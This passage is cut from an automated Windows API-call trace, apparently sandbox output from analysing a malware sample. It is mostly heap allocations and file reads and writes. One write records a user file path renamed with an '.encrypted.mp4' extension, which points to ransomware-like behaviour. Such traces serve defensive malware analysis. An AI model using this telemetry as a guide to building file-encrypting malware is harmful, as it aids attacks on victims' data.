lpNewFilePointer=0x0) returned 1 [0042.699] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0042.699] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.699] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0042.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0042.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.700] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0042.700] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x3514, lpOverlapped=0x0) returned 1 [0042.700] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0042.700] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x3514, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.700] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0042.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0042.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.encrypted.mp4\r\n", cchWideChar=81, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 81 [0042.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x51) returned 0x794b90 [0042.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.encrypted.mp4\r\n", cchWideChar=81, lpMultiByteStr=0x794b90, cbMultiByte=81, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.encrypted.mp4\r\n", lpUsedDefaultChar=0x0) returned 81 [0042.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0042.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0042.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0042.700] WriteFile (in: hFile=0x128, lpBuffer=0x87a9d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87a9d8*, lpNumberOfBytesWritten=0x6aee3c*=0x50, lpOverlapped=0x0) returned 1 [0042.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0042.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.700] CloseHandle (hObject=0x128) returned 1 [0042.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0042.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0042.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0042.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0042.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0042.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0042.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0042.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0042.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0042.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0042.712] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0042.712] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0042.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0042.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0042.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0042.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0042.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0042.713] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0042.714] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.714] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0042.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0042.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0042.714] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0042.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0042.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0042.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5b8 [0042.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0042.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0042.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0042.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0042.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0042.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce98 [0042.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0042.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0042.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0042.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0042.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0042.714] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0042.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0042.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0042.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0042.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0042.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0042.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0042.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0042.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0042.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0042.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0042.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0042.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0042.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0042.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0042.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0042.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0042.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0042.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0042.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0042.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0042.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0042.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0042.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0042.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0042.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0042.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0042.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0042.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0042.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0042.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0042.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0042.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0042.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0042.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0042.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0042.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0042.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0042.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0042.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0042.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0042.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0042.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0042.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0042.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0042.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0042.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0042.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0042.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0042.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0042.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0042.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0042.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0042.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0042.717] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0042.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0042.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0042.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0042.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0042.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0042.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0042.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0042.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0042.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0042.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0042.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0042.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0042.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0042.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0042.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0042.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0042.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0042.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0042.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0042.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0042.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0042.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0042.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0042.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0042.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0042.718] 